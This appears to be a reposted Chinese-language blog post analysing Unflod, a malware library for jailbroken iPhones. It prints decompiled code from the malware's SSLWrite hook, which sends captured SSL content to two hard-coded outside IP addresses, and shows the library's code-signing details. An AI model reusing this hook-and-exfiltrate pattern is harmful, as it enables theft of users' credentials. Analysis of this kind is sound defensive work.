對iOS惡意軟體Unflod的分析

2021-09-23 22:52:17 字數 2312 閱讀 2733

tdvx在reddit上發帖說:從上週起,他用snapchat和google hangouts的使用經常遇到crash,經過排查,他發現是下面這個可疑檔案導致的:/library/mobilesubstrate/dynamiclibraries/unflod.dylib

i0n1c對這個可疑檔案進行了分析,ios malware campaign "unflod baby panda"

這個惡意檔案位於:/library/mobilesubstrate/dynamiclibraries/unflod.dylib或者framework.dylib。依賴於mobilesubstrate,只在越獄裝置上起作用。

`int __fastcall replace_sslwrite(int a1, char *a2, int a3, int a4)


}if ( findhead == 1 )


v13.sa_family = 2;


*(_word *)&v13.sa_data[0] = 0xc61eu;


*(_dword *)&v13.sa_data[2] = inet_addr("23.88.10.4");


if ( connect(v15, &v13, 0x10u) < 0 )


v5 = v15;


v6 = strlen(content);


v14 = write(v5, content, v6);


v11 = 0;


close(v15);


v12 = socket(2, 1, 0);


if ( v12 < 0 )


v10.sa_family = 2;


*(_word *)&v10.sa_data[0] = 0xc61eu;


*(_dword *)&v10.sa_data[2] = inet_addr("23.228.204.55");


if ( connect(v12, &v10, 0x10u) < 0 )


v7 = v12;


v8 = strlen(content);


v11 = write(v7, content, v8);


close(v12);


findhead = 2;}}


} v24 = psslwrite(v23, v22, v21, v20);


label_20:


if ( __stack_chk_guard != v25 )


__stack_chk_fail(__stack_chk_guard, v24, v25, v4);


return v24;


}
這個惡意軟體被iphone開發者證書簽名。簽名資訊如下:

$ codesign -vvvv -d unflod.dylib


executable=./unflod.dylib


identifier=com.your.framework


format=mach-o thin (armv7)


codedirectory v=20100 size=227 flags=0x0(none) hashes=3+5 location=embedded


hash type=sha1 size=20


cdhash=da792624675e82b3460b426f869fbe718abea3f9


signature size=4322


authority=iphone developer: wang xin (p5kfurm8m8)


signed time=14 feb 2014 04:32:58


info.plist=not bound


sealed resources=none


internal requirements count=2 size=484
需要注意的是,這並不表示這個人就是這個事情的始作俑者。這個人可能是假冒的,也可能是其證書被偷竊,也可能是真正涉及到這個事情,但是,我們沒有辦法知道,但是,蘋果需要調查這個事情。

沒有越獄的使用者不用擔心unflod這個惡意軟體。ios 7之後,輸入法,**黑名單等功能系統都自帶,使用者也沒必要越獄了。

建議普通使用者別越獄。越獄需謹慎。

i0n1c分析的原文是:ios malware campaign "unflod baby panda"

好文推薦(news.ios-wiki.com)和ios wiki(www.ios-wiki.com)是我利用業餘時間建立的**。

應用程式外衣下的惡意軟體

ranieri romera 趨勢科技資深威脅研究員 幾天前我無意間看到某使用者發表在公共論壇的帖子,宣傳乙個能檢查巴西公民信用積分和犯罪紀錄的應用程式。看著這個應用程式,我發現它基本上是對公共 做出 要求,以取得資訊並顯示結果。毫無特別的惡意,對吧?1 應用程式主視窗 troj banker.le...

基於機器學習的惡意軟體檢測(二)

乙個有效的,強大的和可擴充套件的惡意軟體識別模組是每個網路安全產品的關鍵組成部分。基於預執行和執行後兩階段收集的資料,惡意軟體識別模組來決定乙個物件是否是乙個威脅。預執行階段的資料 乙個檔案在執行前可獲得所有資料。這可以包括可執行檔案格式描述 描述 二進位制資料統計 通過 提取文字字串和資訊機其他相...

應用程式外衣下的惡意軟體

ranieriromera 趨勢科技資深威脅研究員 幾天前我無意間看到某使用者發表在公共論壇的帖子,宣傳乙個能檢查巴西公民信用積分和犯罪紀錄的應用程式。看著這個應用程式,我發現它基本上是對公共 做出 要求,以取得資訊並顯示結果。毫無特別的惡意,對吧?1 應用程式主視窗 troj banker.leb...